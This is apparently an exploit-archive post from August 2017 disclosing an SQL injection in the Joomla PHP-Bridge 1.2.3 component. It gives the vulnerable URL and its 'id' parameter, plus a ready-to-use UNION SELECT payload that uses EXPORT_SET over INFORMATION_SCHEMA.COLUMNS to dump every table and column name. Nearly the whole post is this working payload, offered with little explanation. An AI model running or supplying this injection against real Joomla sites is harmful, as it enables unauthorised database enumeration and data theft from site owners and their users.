Home / os / winmobile

Joomla PHP-Bridge 1.2.3 SQL Injection

Posted on 03 August 2017

# # # # # # Exploit Title: Joomla! Component PHP-Bridge v1.2.3 - SQL Injection # Dork: N/A # Date: 02.08.2017 # Vendor : http://www.henryschorradt.de/ # Software: https://extensions.joomla.org/extensions/extension/miscellaneous/development/php-bridge/ # Demo: http://www.henryschorradt.de/joomla-php-bridge/ # Version: 1.2.3 # # # # # # Author: Ihsan Sencan # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=[SQL] # -00000090+union+select+1,(sELECT+eXPORT_sET(5,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(5,eXPORT_sET(5,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+- # Etc.. # # # # #

 

TOP